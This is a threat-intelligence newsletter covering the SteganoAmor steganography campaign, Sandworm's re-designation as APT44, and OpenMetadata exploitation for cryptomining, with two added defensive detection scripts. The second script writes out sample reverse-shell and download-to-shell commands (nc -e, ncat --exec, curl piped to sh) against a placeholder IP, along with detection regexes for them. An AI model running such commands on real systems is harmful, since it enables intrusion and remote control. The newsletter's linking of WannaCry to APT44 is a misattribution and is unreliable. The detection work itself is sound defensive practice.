Ransomware/Malware Activity

SteganoAmor Malware Campaign Hides Malicious Payloads via Steganography

Researchers at Positive Technologies have identified over 320 attacks in a malware campaign, primarily targeting organizations in Latin America, that leverages steganography to obfuscate malicious payloads. The hacking group TA558 is believed to be behind the operation. The SteganoAmor attack begins with a phishing email sent from compromised SMTP servers in order to exploit the positive reputation of existing domains. The phishing email carries a Microsoft Office document (Excel or Word) crafted to exploit a known Microsoft Equation Editor vulnerability tracked as CVE-2017-11882. This flaw is nearly seven (7) years old, and the exploit checks the version of Microsoft Office installed to determine whether it will advance to the next stage of the campaign, which downloads a Visual Basic Script (VBS). The script retrieves an image file that uses steganography to hide PowerShell code, which in turn downloads the final payload from a legitimate cloud service to evade detection by anti-virus tools. Researchers have seen multiple malware families delivered as the final payload, including AgentTesla, Remcos, LokiBot, XWorm, and more. All are either remote access tools or infostealers, designed to send stolen information back to the attacker via compromised FTP servers. The use of steganography in this attack provides an evasion technique not commonly seen in modern campaigns. However, the Equation Editor flaw required to carry out the attack is quite old, meaning organizations running later versions of Microsoft Office are safe from the SteganoAmor campaign. CTIX analysts will continue to report on novel and evolving malware versions and associated campaigns.
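The paragraph above describes image files that carry hidden PowerShell. The script below is an added defensive example, not code from the original report or from Positive Technologies, and it makes an assumption about technique: it checks for one common, easily detectable form of image-borne payload hiding, namely data appended after the image's structural end marker (the PNG IEND chunk or the JPEG EOI marker), then looks for script-like strings in that trailing data, both raw and after base64 decoding. The PNG, the placeholder "hidden" text and the marker list are constructed here for the demonstration; a genuinely steganographic payload embedded in pixel data would not be caught by this check.

```python
import base64
import binascii
import re
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
JPEG_SOI = b"\xff\xd8"
JPEG_EOI = b"\xff\xd9"

# Strings a defender would not expect inside an image file. Matching is
# case-insensitive and is applied both to raw trailing bytes and to any
# base64 run in them that decodes cleanly. (Assumed list, not from the report.)
SCRIPT_MARKERS = (b"powershell", b"invoke-expression", b"-encodedcommand",
                  b"frombase64string", b"wscript", b"cmd.exe")
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{200,}={0,2}")


def png_end_offset(data: bytes):
    """Walk the PNG chunk list; return the offset just past IEND's CRC, or None if malformed."""
    off = len(PNG_SIG)
    while off + 8 <= len(data):
        length = struct.unpack(">I", data[off:off + 4])[0]
        ctype = data[off + 4:off + 8]
        off += 8 + length + 4          # chunk header + payload + CRC
        if ctype == b"IEND":
            return off
    return None


def trailing_bytes(data: bytes) -> bytes:
    """Bytes after the format's end-of-image structure (b'' for clean or unsupported files)."""
    if data.startswith(PNG_SIG):
        end = png_end_offset(data)
        return data[end:] if end is not None and end <= len(data) else b""
    if data.startswith(JPEG_SOI):
        # Use the last EOI marker: EXIF thumbnails carry their own EOI earlier in the file.
        end = data.rfind(JPEG_EOI)
        return data[end + 2:] if end != -1 else b""
    return b""


def _marker_hits(blob: bytes, where: str):
    low = blob.lower()
    return [f"marker {m.decode()!r} in {where}" for m in SCRIPT_MARKERS if m in low]


def assess_image(data: bytes) -> dict:
    """Flag images that carry script-like data after their end marker."""
    extra = trailing_bytes(data)
    findings = []
    if extra:
        findings.append(f"{len(extra)} bytes after end-of-image marker")
        findings += _marker_hits(extra, "trailing data")
        for run in B64_RUN.findall(extra):
            try:
                decoded = base64.b64decode(run, validate=True)
            except (binascii.Error, ValueError):
                continue
            findings.append(f"base64 run of {len(run)} chars decodes cleanly")
            findings += _marker_hits(decoded, "base64-decoded trailing data")
    return {"trailing_bytes": len(extra), "suspicious": bool(findings), "findings": findings}


def build_minimal_png() -> bytes:
    """Constructed 1x1 RGB PNG used as test input (not from any campaign sample)."""
    def chunk(ctype, payload):
        body = ctype + payload
        return struct.pack(">I", len(payload)) + body + struct.pack(">I", zlib.crc32(body) & 0xFFFFFFFF)
    ihdr = chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0))
    idat = chunk(b"IDAT", zlib.compress(b"\x00\x00\x00\x00"))  # filter byte + one RGB pixel
    return PNG_SIG + ihdr + idat + chunk(b"IEND", b"")


# Constructed placeholder text standing in for a hidden script; it is not a working payload.
PLACEHOLDER = (b"CONSTRUCTED TEST STRING, NOT A REAL PAYLOAD. " * 5
               + b"powershell Invoke-Expression")
CLEAN_IMAGE = build_minimal_png()
TAMPERED_IMAGE = CLEAN_IMAGE + base64.b64encode(PLACEHOLDER)

if __name__ == "__main__":
    for name, img in (("clean", CLEAN_IMAGE), ("tampered", TAMPERED_IMAGE)):
        print(name, assess_image(img))
```

Run it over files fetched by scripting hosts (a VBS or PowerShell process writing a .png or .jpg is itself worth alerting on); any trailing data at all is unusual for images served by a legitimate site, so the byte count alone is a useful triage signal even when no marker matches.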

Threat Actor Activity

Russian-backed Sandworm Hackers Upgraded to APT44 in Response to Heightened Threat Posed

The Sandworm hacking group, a threat actor with strong ties to Russia's Main Intelligence Directorate (GRU) and previously known as BlackEnergy, Seashell Blizzard, or Voodoo Bear, is now being tracked as APT44 due to the group's highly adaptive nature and the significant risks it poses to governments and critical infrastructure organizations around the world. APT44 has been leveraging sophisticated cyber tactics to conduct espionage, sabotage, and influence operations on a global scale for a decade and a half. Active since at least 2009, the group has evolved its strategies over time, but its true strength has been particularly highlighted in the wake of Russia's invasion of Ukraine, showcasing its ability to support Russia's military campaign with cyber warfare capabilities. APT44 has adeptly used online personas and Telegram channels, such as XakNet Team, CyberArmyofRussia_Reborn, and Solntsepek, to obfuscate its activities, posing as independent hacktivist groups while conducting operations that align with Russia's strategic interests. These platforms have been instrumental in leaking sensitive information, claiming responsibility for cyberattacks, and spreading narratives favorable to Russia, effectively blurring the lines between state-sponsored activities and grassroots hacktivism. The group's cyber operations have been wide-ranging and impactful, targeting not only Ukraine with data-wiping malware and other destructive attacks, but also NATO countries' electoral systems and critical infrastructure across the US and Europe. APT44 has been linked to significant cyber incidents in the past, such as the deployment of NotPetya malware, the WannaCry ransomware attack, and disruptions to water utility infrastructure, including a recent overflow event in Texas. Recent reports underscore the adaptability and sophistication of APT44, highlighting its role in shaping Russia's cyber offensive capabilities. The group's continued focus on Ukraine, coupled with its targeting of countries where Russian interests intersect, signifies a persistent and severe threat to global security.

Vulnerabilities

Attackers Exploit OpenMetadata Applications for Kubernetes Cryptomining Campaign

Threat actors have been observed exploiting multiple critical vulnerabilities in OpenMetadata, a popular open-source metadata management tool, to carry out a Kubernetes cryptomining campaign. The vulnerabilities, identified as CVE-2024-28255, CVE-2024-28847, CVE-2024-28253, CVE-2024-28848, and CVE-2024-28254, include several critical remote code execution and authentication flaws that allow attackers to hijack unpatched, internet-exposed OpenMetadata workloads. Since early April 2024, these vulnerabilities have enabled threat actors to execute code remotely, perform reconnaissance, and download cryptomining malware from a command-and-control (C2) server located in China. The attackers set up persistent access through cron jobs and Netcat reverse shells, and even leave notes pleading for Monero donations to buy a car or "suite" in China. This situation underscores the crucial importance of using strong authentication, keeping software up to date, and adhering to security best practices in containerized environments to prevent exploitation. CTIX analysts urge all OpenMetadata administrators to ensure their instances are up to date.
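The paragraph above names the persistence mechanisms seen in this campaign: cron jobs and Netcat reverse shells. The script below is an added detection example written for this page; it is not code from the original article, from the researchers, or from the OpenMetadata project. It applies a small set of heuristic rules to crontab entries and process command lines of the kind a responder would collect from a suspect pod (for instance via `crontab -l` and `ps`). Every sample line is constructed for the demonstration, the 203.0.113.0/24 addresses are from the RFC 5737 documentation range, and the rule list is an assumption about what such persistence usually looks like rather than the campaign's exact commands.

```python
import re

# Constructed sample input (not from any real incident).
SAMPLE_CRONTAB = [
    "0 3 * * * /usr/bin/certbot renew --quiet",
    "*/5 * * * * curl -s http://203.0.113.10/update.sh | sh",
    "@reboot /dev/shm/.cache/worker -o 203.0.113.10:3333",
    "30 2 * * 0 /usr/local/bin/backup.sh",
]
SAMPLE_PROCESSES = [
    "root      4121  nc -e /bin/sh 203.0.113.10 4444",
    "openmeta  2001  java -jar /opt/openmetadata/bootstrap.jar",
    "root      4130  ncat --exec /bin/bash 203.0.113.10 4444",
]

# Heuristic rules (assumed, not taken from the article). Each is a name and a regex.
RULES = [
    # A downloader whose output is piped straight into a shell: classic cron re-infection.
    ("download piped to shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(/bin/)?(ba|da)?sh\b")),
    # Anything scheduled or launched from a world-writable, often tmpfs, directory.
    ("executable in world-writable dir",
     re.compile(r"(^|\s)(/tmp|/dev/shm|/var/tmp)/\S+")),
    # netcat variants started with an exec flag pointing at a shell.
    ("netcat with exec flag",
     re.compile(r"\b(nc|ncat|netcat)\b.*\s(-e|--exec|-c)\s+\S*sh\b")),
    # bash's built-in TCP pseudo-device is another common socket-to-shell path.
    ("bash /dev/tcp socket",
     re.compile(r"/dev/tcp/\S+")),
]


def classify(line: str) -> list:
    """Return the names of all rules that fire on one crontab or process line."""
    return [name for name, rx in RULES if rx.search(line)]


def scan(cron_lines, proc_lines) -> dict:
    """Group flagged lines by source; lines with no hits are dropped."""
    findings = {}
    for source, lines in (("crontab", cron_lines), ("process", proc_lines)):
        for line in lines:
            hits = classify(line)
            if hits:
                findings.setdefault(source, []).append((line.strip(), hits))
    return findings


if __name__ == "__main__":
    for source, items in scan(SAMPLE_CRONTAB, SAMPLE_PROCESSES).items():
        for line, hits in items:
            print(f"[{source}] {', '.join(hits)}: {line}")
```

These patterns are triage aids, not proof of compromise: a build pipeline may legitimately pipe an installer script into `sh`, so confirm each hit against the pod's expected image contents and the OpenMetadata version in use. In a hardened deployment the same findings are easier to prevent than to detect: run the workload as a non-root user with a read-only root filesystem, restrict egress with a NetworkPolicy so a reverse shell or miner cannot reach the internet, and keep the instance patched as the advisory recommends.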

The content of this article is intended to provide a general guide to the subject matter. Specialist advice should be sought about your specific circumstances.